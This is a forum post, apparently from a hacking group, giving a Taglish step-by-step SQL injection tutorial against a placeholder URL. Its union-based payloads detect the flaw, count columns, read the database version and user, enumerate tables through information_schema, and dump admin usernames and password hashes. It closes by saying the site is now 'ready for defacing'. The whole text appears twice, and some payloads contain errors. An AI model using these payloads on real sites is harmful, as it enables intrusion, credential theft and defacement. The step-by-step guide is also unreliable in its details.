- Messages
- 36
- Reaction score
- 2
- Points
- 28
**SQLinjection basic tutorial**
This tutorial is for educational purpose only.
Okay lets start
Example site: http://CoDeX.com/index.php?id=10
Note example lang yan. Base on my leetname.
Steps on this tutorial
Step 1. First you need to find if the site is vulnerable
http://CoDeX.com/index.php?id=10
//Para malaman if vulnerable ba yung url.
Lagyan ng ' sa dulo.
http://CoDeX.com/index.php?id=10'
//Pag nag error vulnerable yun.
Step 2. Finding columns.
http://CoDeX.com/index.php?id=10 order by 1--
//Walang error (walang mag babago sa site)
Pag patuloy nyo hanggang 2--, 3--, 4--, ......... hanggang sa may makita kayong error sa site. Pag 4--ang nag error ang dun tayo sa 3--, dun sa last na hindi nag error.
Step 3. Select columns
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT 1,2,3--
//May mga numbers na lalabas jan, yan yung columns. Piliin nyo yung naka bold na number. Pag walang naka bold susubukan mo lahat.
Step 4. Finding version,database,user.
//In this part. 1 na uunahin ko if walang naka bold sa columns. Pero kung meron dun kayo mag lagay ng code. Alisin nyo yung number na yun then dun nyo ilagay yung codes.
For version
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT version(),2,3--
For Database
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT database(),2,3--
For user
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT user(),2,3--
Step 5. Finding Tables
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT column_name,2,3 from information_schema.columns where table_name=char()--
//May mga lalabas na tables jan, tapos pili kayo ng table na gagamitin natin next step.
//Ang napili ko is ADMINS.
//Convert natin yun ADMINS into ASCII format
ADMINS = 65 68 77 73 78 83 in ASCII format
//Ilagay natin sa loob ng CHAR yung converted ASCII natin.
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT column_name,2,3 from information_schema.columns where table_name=char(65,68,77,73,78,83)--
//Yan nakuha na rin natin yung columns in table ADMINS.
Step 6. Kunin natin yung username and password.
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT concat(username,0x3a,password),2,3, from ADMINS--
If naka MD5 format convert nyo na lang.
Ready for defacing na yan. pero hanggang jan na lang muna. hihi
Ps: di ko alam kung magulo ba tut ko. Paki intindi na lang.
DONE!!!
Happy Sharing
~CoDeX
#AllHailPHU
This tutorial is for educational purpose only.
Okay lets start
Example site: http://CoDeX.com/index.php?id=10
Note example lang yan. Base on my leetname.
Steps on this tutorial
Step 1. First you need to find if the site is vulnerable
http://CoDeX.com/index.php?id=10
//Para malaman if vulnerable ba yung url.
Lagyan ng ' sa dulo.
http://CoDeX.com/index.php?id=10'
//Pag nag error vulnerable yun.
Step 2. Finding columns.
http://CoDeX.com/index.php?id=10 order by 1--
//Walang error (walang mag babago sa site)
Pag patuloy nyo hanggang 2--, 3--, 4--, ......... hanggang sa may makita kayong error sa site. Pag 4--ang nag error ang dun tayo sa 3--, dun sa last na hindi nag error.
Step 3. Select columns
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT 1,2,3--
//May mga numbers na lalabas jan, yan yung columns. Piliin nyo yung naka bold na number. Pag walang naka bold susubukan mo lahat.
Step 4. Finding version,database,user.
//In this part. 1 na uunahin ko if walang naka bold sa columns. Pero kung meron dun kayo mag lagay ng code. Alisin nyo yung number na yun then dun nyo ilagay yung codes.
For version
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT version(),2,3--
For Database
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT database(),2,3--
For user
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT user(),2,3--
Step 5. Finding Tables
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT column_name,2,3 from information_schema.columns where table_name=char()--
//May mga lalabas na tables jan, tapos pili kayo ng table na gagamitin natin next step.
//Ang napili ko is ADMINS.
//Convert natin yun ADMINS into ASCII format
ADMINS = 65 68 77 73 78 83 in ASCII format
//Ilagay natin sa loob ng CHAR yung converted ASCII natin.
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT column_name,2,3 from information_schema.columns where table_name=char(65,68,77,73,78,83)--
//Yan nakuha na rin natin yung columns in table ADMINS.
Step 6. Kunin natin yung username and password.
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT concat(username,0x3a,password),2,3, from ADMINS--
If naka MD5 format convert nyo na lang.
Ready for defacing na yan. pero hanggang jan na lang muna. hihi
Ps: di ko alam kung magulo ba tut ko. Paki intindi na lang.
DONE!!!
Happy Sharing
~CoDeX
#AllHailPHU